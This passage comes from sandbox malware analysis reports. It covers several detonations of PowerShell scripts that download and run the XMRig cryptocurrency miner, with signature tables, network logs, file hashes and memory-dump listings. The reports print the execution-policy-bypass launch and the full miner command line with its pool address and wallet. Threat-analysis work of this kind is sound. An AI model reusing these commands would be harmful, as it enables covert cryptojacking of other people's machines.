memory/4912-80-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
memory/4912-81-0x00007FF744DD0000-0x00007FF745A03000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win11-20240508-en
Max time kernel
293s
Max time network
279s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 28 hits; the report records no description, indicator, process or target for any of them | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 888 wrote to memory of 3932 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 888 wrote to memory of 3932 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
Files
memory/888-0-0x00007FFF6B3E0000-0x00007FFF6B5E9000-memory.dmp
memory/888-2-0x00007FFF6B3E0000-0x00007FFF6B5E9000-memory.dmp
memory/888-1-0x00007FFF6B3E0000-0x00007FFF6B5E9000-memory.dmp
memory/888-3-0x0000028E3E6D0000-0x0000028E3E6F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mcunwxbo.oez.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/888-12-0x00007FFF6B3E0000-0x00007FFF6B5E9000-memory.dmp
memory/888-13-0x00007FFF6B3E0000-0x00007FFF6B5E9000-memory.dmp
memory/888-15-0x0000028E3E780000-0x0000028E3E792000-memory.dmp
memory/888-16-0x0000028E26270000-0x0000028E2627A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3932-47-0x000001E2AF070000-0x000001E2AF090000-memory.dmp
memory/3932-48-0x00007FFF6B3E0000-0x00007FFF6B5E9000-memory.dmp
memory/3932-49-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-51-0x00007FFF6B3E0000-0x00007FFF6B5E9000-memory.dmp
memory/3932-50-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-52-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-53-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-54-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-55-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-56-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-57-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-58-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-59-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-60-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-61-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-62-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-63-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-64-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-65-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-66-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-67-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-68-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-69-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-70-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-71-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-72-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-73-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-74-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
memory/3932-75-0x00007FF64BAC0000-0x00007FF64C6F3000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
291s
Max time network
267s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 28 hits; the report records no description, indicator, process or target for any of them | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 216 wrote to memory of 2844 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 216 wrote to memory of 2844 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
Files
memory/216-0-0x00007FF9A8013000-0x00007FF9A8015000-memory.dmp
memory/216-1-0x000002707A680000-0x000002707A6A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i1i4fywp.oyl.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/216-11-0x00007FF9A8010000-0x00007FF9A8AD1000-memory.dmp
memory/216-12-0x00007FF9A8010000-0x00007FF9A8AD1000-memory.dmp
memory/216-13-0x00007FF9A8013000-0x00007FF9A8015000-memory.dmp
memory/216-14-0x00007FF9A8010000-0x00007FF9A8AD1000-memory.dmp
memory/216-16-0x00007FF9A8010000-0x00007FF9A8AD1000-memory.dmp
memory/216-17-0x000002707ADF0000-0x000002707AE02000-memory.dmp
memory/216-18-0x000002707ADE0000-0x000002707ADEA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2844-49-0x000001A356050000-0x000001A356070000-memory.dmp
memory/2844-50-0x000001A3560A0000-0x000001A3560C0000-memory.dmp
memory/2844-51-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-52-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-54-0x000001A357990000-0x000001A3579B0000-memory.dmp
memory/2844-53-0x000001A3560C0000-0x000001A3560E0000-memory.dmp
memory/2844-55-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/216-56-0x00007FF9A8010000-0x00007FF9A8AD1000-memory.dmp
memory/2844-57-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-58-0x000001A3560C0000-0x000001A3560E0000-memory.dmp
memory/2844-59-0x000001A357990000-0x000001A3579B0000-memory.dmp
memory/2844-60-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-61-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-62-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-63-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-64-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-65-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-66-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-67-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-68-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-69-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-70-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-71-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-72-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-73-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-74-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-75-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-76-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-77-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-78-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-79-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-80-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-81-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240226-en
Max time kernel
301s
Max time network
283s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4472 wrote to memory of 2644 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4472 wrote to memory of 2644 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4112 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 13.107.253.64:443 | | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.179.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.173.189.20.in-addr.arpa | udp |
Files
memory/4472-0-0x00007FFE94223000-0x00007FFE94225000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zz3livfo.ftq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4472-10-0x000001936AFB0000-0x000001936AFD2000-memory.dmp
memory/4472-11-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp
memory/4472-12-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp
memory/4472-13-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp
memory/4472-14-0x00007FFE94223000-0x00007FFE94225000-memory.dmp
memory/4472-15-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp
memory/4472-16-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp
memory/4472-17-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp
memory/4472-19-0x000001936B340000-0x000001936B352000-memory.dmp
memory/4472-20-0x000001936B320000-0x000001936B32A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2644-51-0x0000018D68600000-0x0000018D68620000-memory.dmp
memory/2644-52-0x0000018DFC470000-0x0000018DFC490000-memory.dmp
memory/2644-53-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-56-0x0000018DFCAE0000-0x0000018DFCB00000-memory.dmp
memory/2644-55-0x0000018DFC8B0000-0x0000018DFC8D0000-memory.dmp
memory/2644-54-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-57-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-58-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-60-0x0000018DFCAE0000-0x0000018DFCB00000-memory.dmp
memory/2644-59-0x0000018DFC8B0000-0x0000018DFC8D0000-memory.dmp
memory/2644-61-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-62-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-63-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-64-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-65-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-66-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-67-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-68-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-69-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-70-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-71-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-72-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-73-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-74-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-75-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-76-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-77-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-78-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-79-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
290s
Max time network
290s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3144 wrote to memory of 4048 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3144 wrote to memory of 4048 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3804,i,15140928051103392835,1612840580898364401,262144 --variations-seed-version --mojo-platform-channel-handle=4120 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
